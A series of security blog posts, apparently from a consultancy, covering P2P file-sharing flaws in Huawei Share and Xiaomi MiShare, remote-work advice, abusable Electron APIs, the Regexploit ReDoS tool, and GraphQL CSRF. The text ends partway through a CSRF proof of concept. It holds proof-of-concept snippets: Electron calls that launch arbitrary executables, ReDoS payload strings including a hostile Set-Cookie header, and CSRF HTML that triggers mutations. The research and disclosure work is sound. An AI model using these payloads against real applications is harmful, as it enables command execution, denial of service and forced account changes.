Unfortunately, the stumbling block for Huawei Share is the stability of the services: multiple HTTP requests that could respectively crash the FTCService or FTSService were identified. Since the crashes could be triggered by any third-party application installed on the user’s device and because of the UPnP General Event Notification Architecture (GENA) design itself, an attacker can still take over any communication initiated by the legit Huawei Share applications, stealing Session IDs and hijacking file transfers.

Abusing FTS/FTC Crashes

In the replicated attack scenario, Alice and Bob’s devices are connected and paired on a Direct Wi-Fi connection. Bob also unwittingly runs a malicious application with little or no privileges on his device. In this scenario, Bob initiates a file share through Huawei Share 1. His legit application will, therefore, send a CreateSession SOAP action through a POST request to Alice’s FTCService to get a valid SessionID, which will be used as an authorization token for the rest of the transaction. During a standard exchange, after Alice accepts the transfer on her device, a file share event notification (NOTIFY /evetSub) will fire to Bob’s FTSService. The FTSService will then be used to serve the intended file.

NOTIFY /evetSub HTTP/1.1
Content-Type: text/xml; charset="utf-8"
HOST: 192.168.49.1
NT: upnp:event
NTS: upnp:propchange
SID: uuid:e9400170-a170-15bd-802e-165F9431D43F
SEQ: 1
Content-Length: 218
Connection: close
 
<?xml version="1.0" encoding="utf-8"?>
<e:propertyset xmlns:e="urn:schemas-upnp-org:event-1-0">
   <e:property>
      <TransportStatus>1924435235:READY_FOR_TRANSPORT</TransportStatus>
   </e:property>
</e:propertyset>

Since an inherent time span exists between the manual acceptance of the transfer by Alice and its start, the malicious application could perform a request with an ad-hoc payload to trigger a crash of FTSService 2 and subsequently bind to the same port its own FTSService 3. Because of the UPnP event subscription and notification protocol design, the NOTIFY event including the SessionID (1924435235 in the example above) can now be intercepted by the fake FTSService 4 and used by the malicious application to serve arbitrary files.

The crashes are undetectable both to the device’s user and to the file recipient. Multiple crash vectors using malformed requests were identified, making the service systemically weak and exploitable.


Xiaomi Mi Share

Introduced with MIUI 11, Xiaomi’s MiShare offers AirDrop-like file transfer features between Mi and Redmi phones. Recently this feature was extended to be compatible with devices produced by the “Peer-to-Peer Transmission Alliance” (including vendors with over 400M users such as Xiaomi, OPPO, Vivo, Realme, Meizu).

Due to this transition, MiShare internally features two different sets of APIs:

  • One using bare HTTP requests, with many RESTful routes
  • One using mainly Websockets Secure (WSS) and only a handful of HTTPS requests

The websocket-based API is currently used by default for transfers between Xiaomi Devices and this is the one we assessed. As in other P2P solutions, several minor design and implementation bugs were identified:

  • The JSON-encoded parcel sent via WSS specifying the file properties is trusted and its fileSize parameter is used to check if there is available space on the device left. Since this is the sender’s declared file size, a Denial of Service (DoS) exhausting the remaining space is possible.

  • Session tokens (taskId) are 19-digits long and a weak source of entropy (java.util.Random) is used to generate them.

  • Just like the other presented vendor solutions, any third-party application installed on the user’s device can meddle with MiShare’s exchange. While several DoS payloads crashing MiShare are also available, for this vendor the file transfer service is restarted very quickly, making the window of opportunity for an attack very limited.

On a brighter note, the Mi Share protocol design was hardened using per-session TLS certificates when communicating through WSS and HTTPS, limiting the exploitability of many security issues.


Conclusions

Some of the attacks described can be easily replicated in other existing mobile file transfer solutions. While the core technology has always been there, OEMs still struggle to defend their own P2P sharing flavors. Other common vulnerabilities found in the past include similar improper access control issues, path traversals, XML External Entity (XXE), improper file management, and monkey-in-the-middle (MITM) of the connection.

All vulnerabilities briefly described in this post were responsibly disclosed to the respective OEM security teams between April and June 2020.

Psychology of Remote Work

16 December 2020 at 23:00

This is the first in a series of non-technical blog posts aiming at discussing the opportunities and challenges that arise when running a small information security consulting company. After all, day to day life at Doyensec is not only about computers and stories of breaking bits.

The pandemic has deeply affected standard office work and forced us to immediately change our habits. In all probability, no one could have predicted that suddenly the office was going to be “moved”, and the new location is a living room. Remote work has been a hot topic for many years, however the current situation has certainly accelerated the adoption and forced companies to make a change.

At Doyensec, we’ve been a 100% remote company since day one. In this blog post, we’d like to present our best practices and also list some of the myths which surround the idea of remote work. This article is based on our personal experience and will hopefully help the reader to work at home more efficiently. There are no magic recipes here, just a collection of things that work for us.

5 standard rules we follow and 7 myths that we believe are false

obrazek

Five Golden Rules

1. “Work” separated from the “Home” zone

The most effective solution is to work in a separate and dedicated room, which automatically becomes your office. It is important to physically separate somehow the workplace from the rest of the house, e.g. a screen, small bookcase or curtain. The worst thing you can do is work on the couch or bed where you usually rest. We try not to review source code from the place where we normally eat snacks, or debug an application in the same place we sleep. If possible, work at a desk. It will also be easier for you to mobilize yourself for a specific activity. Also, make sure that your household, especially your young children, do not play in your “office area”. It will be best if this “home office space” belongs exclusively to you.

2. The importance of a workplace

Prepare a desk with adequate lighting and a comfortable chair. We emphasize the need for a functional, ergonomic chair, and not simply an armchair. It’s about working effectively. The time to relax will come later. Arrange everything so that you work with ease. Notebooks and other materials should be tidied up on the desk and kept neat. This will be a clear, distinguishing feature of the work place. Family members should know that this is a work area from the way it looks. It will be easier for them to get used to the fact that instead of “going to work,” work related responsibilities will be performed at home. Also, this setup gives an opportunity to make security testing more efficient - for example by setting up bigger screens and ready to use testing equipment.

3. Control your time (establish a routine)

A flexible working time can be treacherous. There are times when an eight hour working day is sufficient to complete an important project. On the other hand, there are situations where various distractions can take attention away from an assigned task. In order to avoid this type of scenario, fixed working hours must be established. For example, some Doyensec employees use BeFocused and Timing apps to regulate their time. Intuitive and user friendly applications will help you balance your private and professional life and will also remind you when it’s time to take a break. Working long hours with no breaks is the main source of burnout.

4. Find excuses to leave your house (vary the routine)

Traditional work is usually based on a structured day spent in an office environment. The day is organized into work sessions and breaks. When working at home, on the other hand, time must be allotted for non-work related responsibilities on a more subjective basis. It is important for the routine to be elastic enough to include breaks for everything from physical activity (walks) to shopping (groceries) and social interaction. Leaving the house regularly is very beneficial. A break will bring on a refreshed perspective. The current pandemic is obviously the reason why people spend more time inside. Outside physical activities are very important to keep our minds fresh and a set of new endorphins is always welcome. As proof of evidence, our best bugs are usually discovered after a run or a walk outside!

5. Avoid distractions

While this sounds like simple and intuitive advice, avoiding distractions is actually really difficult! In general it’s good to turn off notifications on your computer or phone, especially while working. We trust our people and they don’t have to be immediately 100% reachable when working. As long as our consultants provide updates and results when needed, it is perfectly fine to shutdown email and other communication channels. Depending on personal preference, some individuals require complete silence, while others can accomplish their work while listening to music. If you belong to that category of people who cannot work in absolute silence and normal music levels are too intense, consider using white noise. There are applications available that you can use to create a neutral soundtrack that helps you to concentrate. You can easily follow our recommendation on Spotify: something calm, maybe jazz style or classy.

FactMyth

Seven Myths

Let’s now talk about some myths related to remote work:

1. Remote employees have no control over projects

At Doyensec, we have successfully delivered hundreds of projects that were done exclusively remotely. If we are delivering a small project, we usually allocate one security researcher who is able to start the project from scratch and deliver a high quality deliverable, but sometimes we have 2-3 consultants working on the same engagement and the outcome is of the same quality. Most of our communication goes through (PGP-encrypted) emails. An instant messenger can help a great deal when answers are needed quickly. The real challenge is in hiring the right people who can control the project regardless of their physical location. While employing people for our company, we look at both technical and project management skills. According to Jason Fried and Davis Heinemeier Hansson, 37 Signal co-founders, you shouldn’t hire people you don’t trust (Remote). We totally agree with this statement.

2. Remote employees cannot learn from colleagues

The obvious fact is that it is easier to learn when a colleague is physically in the same office and not on the other side of the screen, but we have learned to deal with this problem. Part of our organizational culture is a “screen sharing session” where two people working on the same project analyze source code and look for vulnerabilities together. During our weekly meetings, we also organize a session called “best bugs” where we all share the most interesting findings from a given week.

3. Remote work = lack of work & life balance?

If a person is not able to organize his/her work day properly, it is easy to drag out the work day from early in the morning to midnight instead of completing everything within the expected eight hours. Self discipline and iterative improvements are the key solutions for an effective day. Work/life balance is important, but who said that forcing a 9am-5pm schedule is the best way to work? Wouldn’t it be better to visit a grocery store or a gym in the middle of the day when no one is around and finish work in the evening?

4. Employees not under control

Healthy remote companies rely on trust. If they didn’t then they wouldn’t offer remote work opportunities in the first place. People working at home carry out their duties like everyone else. In fact, planning activities such as gym-workouts, family time, and hobbies is much easier thanks to the flexible schedule. You can freely organize your work day around important family matters or other responsibilities if necessary.

Companies should be focused on having better hiring processes and ensuring long-term retention instead of being over concerned about the risk of “remote slacking”. In fact, our experience in the past four years would actually suggest that it is more challenging to ensure a healthy work/life balance since our researchers are sufficiently motivated and love what they do.

5. Remote work means working outside the employer’s office

It should be understood that not all remote work is the same. If you work in customer service and receive regular calls from customers, for example, you might be working from a confined space in a separate room at home. Remote work means working outside the employer’s office. It can mean working in a co-working space, cafeteria, hotel or any other place where you have a good Internet connection.

6. Remote work is lonely

This one is a bit tricky since it’s technically true and false. It’s true that you usually sit at home and work alone, but in our security work we’re constantly exchanging information via e-mails, Mattermost, Signal, etc. We also have Hangouts video meetings where we can sync up. If someone feels personally isolated, we always recommend signing up for some activities like a gym, book club or other options where like-minded people associate. Lonely individuals are less productive over the long run. Compared to the traditional office model, remote work requires looking for friends and colleagues outside the company - which isn’t a bad thing after all.

7. Remote work is for everyone

We strongly believe that there are people who will still prefer an onsite job. Some individuals need constant contact with others. They also prefer the standard 9am-5pm work schedule. There is nothing wrong with that. People that are working remotely have to make more decisions on their own and need stronger self-discipline. Since they are unable to engage in direct consultation with co-workers, a reduction of direct communication occurs. Nevertheless, remote work will become something “normal” for an increasing number of people, especially for the Y and Z generation.

Electron APIs Misuse: An Attacker’s First Choice

15 February 2021 at 23:00

ElectronJs is getting more secure every day. Context isolation and other security settings are planned to become enabled by default with the upcoming release of Electron 12 stable, seemingly ending the somewhat deserved reputation of a systemically insecure framework.

Seeing such significant and tangible progress makes us proud. Over the past years we’ve committed to helping developers securing their applications by researching different attack surfaces:

As confirmed by the Electron development team in the v11 stable release, they plan to release new major versions of Electron (including new versions of Chromium, Node, and V8), approximately quarterly. Such an ambitious versioning schedule will also increase the number and the frequency of newly introduced APIs, planned breaking changes, and consequent security nuances in upcoming versions. While new functionalities are certainly desirable, new framework’s APIs may also expose powerful interfaces to OS features, which may be more or less inadvertently enabled by developers falling for the syntactic sugar provided by Electron.

Electron Hardened

Such interfaces may be exposed to the renderer’s, either through preloads or insecure configurations, and can be abused by an attacker beyond their original purpose. An infamous example of this is openExternal.

Shell’s openExternal() allows opening a given external protocol URI with the desktop’s native utilities. For instance, on macOS, this function is similar to the open terminal command utility and will open the specific application based on the URI and filetype association. When openExternal is used with untrusted content, it can be leveraged to execute arbitrary commands, as demonstrated by the following example:

const {shell} = require('electron') 
shell.openExternal('file:///System/Applications/Calculator.app')

Similarly, shell.openPath(path) can be used to open the given file in the desktop’s default manner.

From an attacker’s perspective, Electron-specific APIs are very often the easiest path to gain remote code execution, read or write access to the host’s filesystem, or leak sensitive user’s data. Malicious JavaScript running in the renderer can often subvert the application using such primitives.

With this in mind, we gathered a non-comprehensive list of APIs we successfully abused during our past engagements. When exposed to the user in the renderer, these APIs can significantly affect the security posture of Electron-based applications and facilitate nodeIntegration / sandbox bypasses.


Remote.app

The remote module provides a way for the renderer processes to access APIs normally only available in the main process. In Electron, GUI-related modules (such as dialog, menu, etc.) are only available in the main process, not in the renderer process. In order to use them from the renderer process, the remote module is necessary to send inter-process messages to the main process.

While this seems pretty useful, this API has been a source of performance and security troubles for quite a while. As a result of that, the remote module will be deprecated in Electron 12, and eventually removed in Electron 14.

Despite the warnings and numerous articles on the topic, we have seen a few applications exposing Remote.app to the renderer. The app object controls the full application’s event lifecycle and it is basically the heart of every Electron-based application.

Many of the functions exposed by this object can be easily abused, including but not limited to:

Taking the first function as a way of example, app.relaunch([options]) can be used to relaunch the app when the current instance exits. Using this primitive, it is possible to specify a set of options, including a execPath property that will be executed for relaunch instead of the current app along with a custom args array that will be passed as command-line arguments. This functionality can be easily leveraged by an attacker to execute arbitrary commands.

Native.app.relaunch({args: [], execPath: "/System/Applications/Calculator.app/Contents/MacOS/Calculator"});
Native.app.exit()

Note that the relaunch method alone does not quit the app when executed, and it is also necessary to call app.quit() or app.exit() after calling the method to make the app restart.

systemPreferences

Another frequently exported module is systemPreferences. This API is used to get the system preferences and emit system events, and can therefore be abused to leak multiple pieces of information on the user’s behavior and their operating system activity and usage patterns. The metadata subtracted through the module could be then abused to mount targeted attacks.

subscribeNotification, subscribeWorkspaceNotification

These methods could be used to subscribe to native notifications of macOS. Under the hood, this API subscribes to NSDistributedNotificationCenter. Before macOS Catalina, it was possible to register a global listener and receive all distributed notifications by invoking the CFNotificationCenterAddObserver function with nil for the name parameter (corresponding to the event parameter of subscribeNotification). The callback specified would be invoked anytime a distributed notification is broadcasted by any app. Following the release of macOS Catalina or Big Sur, in the case of sandboxed applications it is still possible to globally sniff distributed notifications by registering to receive any notification by name. As a result, many sensitive events can be sniffed, including but not limited to:

  • Screen locks/unlocks
  • Screen saver start/stop
  • Bluetooth activity/HID Devices
  • Volume (USB, etc) mount/unmount
  • Network activity
  • User file downloads
  • Newly Installed Applications
  • Opened Source Code Files
  • Applications in Use
  • Loaded Kernel Extensions
  • …and more from the installed application including sensitive information in them. Distributed notifications will always be public by design, and it was never correct to put sensitive information in them.

The latest NSDistributedNotificationCenter API also seems to be having intermittent problems with Big Sur and sandboxed application, so we expected to see more breaking changes in the future.

getUserDefault, setUserDefault

The getUserDefault function returns the value of key in NSUserDefaults, a macOS simple storage class that provides a programmatic interface for interacting with the defaults system. This systemPreferences method can be abused to return the Application’s or Global’s Preferences. An attacker may abuse the API to retrieve sensitive information including the user’s location and filesystem resources. As a matter of demonstration, getUserDefault can be used to obtain personal details of the targeted application user:

  • User’s most recent locations on the file system
    > Native.systemPreferences.getUserDefault("NSNavRecentPlaces","array")
    (5) ["/tmp/secretfile", "/tmp/SecretResearch", "~/Desktop/Cellar/NSA_files", "/tmp/blog.doyensec.com/_posts", "~/Desktop/Invoices"]
    
  • User’s selected geographic location
    Native.systemPreferences.getUserDefault("com.apple.TimeZonePref.Last_Selected_City","array")
    (10) ["48.40311", "11.74905", "0", "Europe/Berlin", "DE", "Freising", "Germany", "Freising", "Germany", "DEPRECATED IN 10.6"]
    

Complementarily, the setUserDefault method can be weaponized to set User’s Default for the Application Preferences related to the target application. Before Electron v8.3.0 [1], [2] these methods can only get or set NSUserDefaults keys in the standard suite.

Shell.showItemInFolder

A subtle example of a potentially dangerous native Electron primitive is shell.showItemInFolder. As the name suggests, this API shows the given file in a file manager.

shell.showItemInFolder

Such seemingly innocuous functionality hides some peculiarities that could be dangerous from a security perspective.

On Linux (/shell/common/platform_util_linux.cc), Electron extracts the parent directory name, checks if the resulting path is actually a directory and then uses XDGOpen (xdg-open) to show the file in its location:

void ShowItemInFolder(const base::FilePath& full_path) {
  base::FilePath dir = full_path.DirName();
  if (!base::DirectoryExists(dir))
    return;

  XDGOpen(dir.value(), false, platform_util::OpenCallback());
}

xdg-open can be leveraged for executing applications on the victim’s computer.

“If a file is provided the file will be opened in the preferred application for files of that type” (https://linux.die.net/man/1/xdg-open)

Because of the inherited time of check time of use (TOCTOU) condition caused by the time difference between the directory existence check and its launch with xdg-open, an attacker could run an executable of choice by replacing the folder path with an arbitrary file, winning the race introduced by the check. While this issue is rather tricky to be exploited in the context of an insecure Electron’s renderer, it is certainly a potential step in a more complex vulnerabilities chain.

On Windows (/shell/common/platform_util_win.cc), the situation is even more tricky:

void ShowItemInFolderOnWorkerThread(const base::FilePath& full_path) {
...
  base::win::ScopedCoMem<ITEMIDLIST> dir_item;
  hr = desktop->ParseDisplayName(NULL, NULL,
                                 const_cast<wchar_t*>(dir.value().c_str()),
                                 NULL, &dir_item, NULL);

  const ITEMIDLIST* highlight[] = {file_item};
  hr = SHOpenFolderAndSelectItems(dir_item, base::size(highlight), highlight,
                                  NULL);
...
 if (FAILED(hr)) {
 	if (hr == ERROR_FILE_NOT_FOUND) {
      ShellExecute(NULL, L"open", dir.value().c_str(), NULL, NULL, SW_SHOW);
    } else {
      LOG(WARNING) << " " << __func__ << "(): Can't open full_path = \""
                   << full_path.value() << "\""
                   << " hr = " << logging::SystemErrorCodeToString(hr);
    }
  }
}

Under normal circustances, the SHOpenFolderAndSelectItems Windows API (from shlobj_core.h) is used. However, Electron introduced a fall-back mechanism as the call mysteriously fails with a “file not found” exception on old Windows systems. In these cases, ShellExecute is used as a fallback, specifying “open” as the lpVerb parameter. According to the Windows Shell documentation, the “open” object verb launches the specified file or application. If this file is not an executable file, its associated application is launched.

While the exploitability of these quirks is up to discussions, these examples showcase how innoucous APIs might introduce OS-dependent security risks. In fact, Chromium has refactored the code in question to avoid the use of xdg-open altogether and leverage dbus instead.


The Electron APIs illustrated in this blog post are just a few notable examples of potentially dangerous primitives that are available in the framework. As Electron will become more and more integrated with all supported operating systems, we expect this list to increase over time. As we often repeat, know your framework (and its limitations) and adopt defense in depth mechanisms to mitigate such deficiencies.

As a company, we will continue to devote our 25% research time to secure the ElectronJS ecosystem and improve Electronegativity.

Regexploit: DoS-able Regular Expressions

10 March 2021 at 23:00

When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS) where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is in the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has been proven to be extremely effective, as demonstrated by many vulnerabilities discovered across popular NPM, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

until it successfully matches a dot - $1="123.456"

123.456.789
123.456.789
123.456.789

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

123.456.789
123.456.789
123.456.789

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789
123.456.789

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.

If backtracking takes an extreme amount of time, it will cause a Denial of Service, such as what happened to Cloudflare in 2019. In runtimes like NodeJS, the Event Loop will be blocked which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [ˆ\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [ˆ\);]+ and [ˆ\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and pypi libraries (grabbed from the libraries.io API) to find out.

regexes
regexes
ReDoS
Libraries.io
pypi / npm downloader
regexploit-js
Regexploit
regexploit-py
Triage

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+ in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n3) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
       (?:\s+|[-\/])
    (\w+)              # month
        (?:\s+|[-\/])
    (\d+)              # year
    (?:
          (?:\s+|:)    # separator before clock
       (\d\d?):(\d\d)  # hour:min
       (?::(\d\d))?    # optional seconds
    )?                 # optional clock
       \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
       \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
       \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regex engine re2 does not backtrack.

Its design (Deterministic Finite Automaton) was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that regex matching will occur in linear time regardless of input. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. There are also some regex features such as backreferences which had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.

How to meme?

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids REDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.

Gotta catch ‘em all 🐛🐞🦠

That single GraphQL issue that you keep missing

19 May 2021 at 22:00

With the increasing popularity of GraphQL on the web, we would like to discuss a particular class of vulnerabilities that is often hidden in GraphQL implementations.

GraphQL what?

GraphQL is an open source query language, loved by many, that can help you in building meaningful APIs. Its major features are:

  • Aggregating data from multiple sources
  • Decoupling the data from the database underneath, through a graph form
  • Ensuring input type correctness with minimal effort from the developers

CSRF eh?

Cross Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web application causes a web browser to perform an unwanted action on the behalf of an authenticated user. Such an attack works because browser requests automatically include all cookies, including session cookies.

GraphQL CSRF: more buzzword combos please!

POST-based CSRF

POST requests are natural CSRF targets, since they usually change the application state. GraphQL endpoints typically accept Content-Type headers set to application/json only, which is widely believed to be invulnerable to CSRF. As multiple layers of middleware may translate the incoming requests from other formats (e.g. query parameters, application/x-www-form-urlencoded, multipart/form-data), GraphQL implementations are often affected by CSRF. Another incorrect assumption is that JSON cannot be created from urlencoded requests. When both of these assumptions are made, many developers may incorrectly forego implementing proper CSRF protections.

The false sense of security works in the attacker’s favor, since it creates an attack surface which is easier to exploit. For example, a valid GraphQL query can be issued with a simple application/json POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 100
accept: */*
User-Agent: ...
content-type: application/json
Referer: https://redacted/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

{"operationName":null,"variables":{},"query":"{\n  user {\n    firstName\n    __typename\n  }\n}\n"}

It is common, due to middleware magic, to have a server accepting the same request as form-urlencoded POST request:

POST /graphql HTTP/1.1
Host: redacted
Connection: close
Content-Length: 72
accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: https://redacted
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ...

query=%7B%0A++user+%7B%0A++++firstName%0A++++__typename%0A++%7D%0A%7D%0A

Which a seasoned Burp user can quickly convert to a CSRF PoC through Engagement Tools > Generate CSRF PoC

shell.showItemInFolder
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://redacted/graphql" method="POST">
      <input type="hidden" name="query" value="&#123;&#10;&#32;&#32;user&#32;&#123;&#10;&#32;&#32;&#32;&#32;firstName&#10;&#32;&#32;&#32;&#32;&#95;&#95;typename&#10;&#32;&#32;&#125;&#10;&#125;&#10;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

While the example above only presents a harmless query, that’s not always the case. Since GraphQL resolvers are usually decoupled from the underlying application layer they are passed, any other query can be issued, including mutations.

GET Based CSRF

There are two common issues that we have spotted during our past engagements.

The first one is using GET requests for both queries and mutations.

For example, in one of our recent engagements, the application was exposing a GraphiQL console. GraphiQL is only intended for use in development environments. When misconfigured, it can be abused to perform CSRF attacks on victims, causing their browsers to issue arbitrary query or mutation requests. In fact, GraphiQL does allow mutations via GET requests.

shell.showItemInFolder

While CSRF in standard web applications usually affects only a handful of endpoints, the same issue in GraphQL is generally system-wise.

For the sake of an example, we include the Proof-of-Concept for a mutation that handles a file upload functionality:

<!DOCTYPE html>
<html>
<head>
    <title>GraphQL CSRF file upload</title>
</head>
	<body>
		<iframe src="https://graphql.victimhost.com/?query=mutation%20AddFile(%24name%3A%20String!%2C%20%24data%3A%20String!%2C%20%24contentType%3A%20String!) %20%7B%0A%20%20AddFile(file_name%3A%20%24name%2C%20data%3A%20%24data%2C%20content_type%3A%20%24contentType) %20%7B%0A%20%20%20%20id%0A%20%20%20%20__typename%0A%20%20%7D%0A%7D%0A&variables=%7B%0A %20%20%22data%22%3A%20%22%22%2C%0A%20%20%22name%22%3A%20%22dummy.pdf%22%2C%0A%20%20%22contentType%22%3A%20%22application%2Fpdf%22%0A%7D"></iframe>
	</body>
</html>

The second issue arises when a state-changing GraphQL operation is misplaced in the queries, which are normally non-state changing. In fact, most of the GraphQL server implementations respect this paradigm, and they even block any kind of mutation through the GET HTTP method. Discovering this type of issues is trivial, and can be performed by enumerating query names and trying to understand what they do. For this reason, we developed a tool for query/mutation enumeration.

During an engagement, we discovered the following query that was issuing a state changing operation:

req := graphql.NewRequest(`
	query SetUserEmail($email: String!) {
		SetUserEmail(user_email: $email) {
			id
			email
		}
	}
`)

Given that the id value was easily guessable, we were able to prepare a CSRF PoC:

<!DOCTYPE html>
<html>
	<head>
		<title>GraphQL CSRF - State Changing Query</title> 
	</head>
	<body>
